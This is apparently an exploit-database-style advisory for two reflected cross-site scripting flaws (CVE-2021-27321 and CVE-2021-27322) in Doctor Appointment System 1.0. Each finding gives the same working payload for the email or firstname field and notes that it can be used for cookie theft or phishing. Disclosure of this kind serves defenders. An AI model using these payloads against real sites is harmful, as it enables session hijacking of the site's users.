Doctor Appointment System version 1.0 suffers from multiple cross site scripting vulnerabilities. These are additional findings with original discovery of cross site scripting in this version being attributed to Soham Bakore in February of 2021.
b098137654368cff53ff815f613c4ed7917ea68d5a2afab78153a61a45603e3a
# Exploit Title: Doctor Appointment System 1.0 - Reflected POST based Cross Site Scripting (XSS) in email parameter
# Date: 03-03-2021
# CVE: CVE-2021-27321
# Exploit Author: Soham Bakore
# Vendor Homepage:
https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Software Link:
https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Version: V1.0
Vulnerable File:
----------------
http://host/doctorappointment/contactus.php
<http://host/patient/search_result.php>
Vulnerable Issue:
-----------------
email parameter has no input validation
POC:
----
1] Navigate to http://host/doctorappointment/contactus.php
2] In the email parameter enter following payload to execute arbitrary javascript code : '</script><svg/onload=alert(document.cookie)>
3] This can be used to steal cookies or perform phishing attacks on the web application
------------------------------------------
# Exploit Title: Doctor Appointment System 1.0 - Reflected POST based Cross Site Scripting (XSS) in firstname parameter
# Date: 03-03-2021
# CVE: CVE-2021-27322
# Exploit Author: Nakul Ratti
# Vendor Homepage: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Software Link: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Version: V1.0
Vulnerable File:
----------------
http://host/doctorappointment/contactus.php
<http://host/patient/search_result.php>
Vulnerable Issue:
-----------------
firstname parameter has no input validation
POC:
----
1] Navigate to http://host/doctorappointment/contactus.php
2] In the firstname parameter enter following payload to execute arbitrary javascript code : '</script><svg/onload=alert(document.cookie)>
3] This can be used to steal cookies or perform phishing attacks on the web application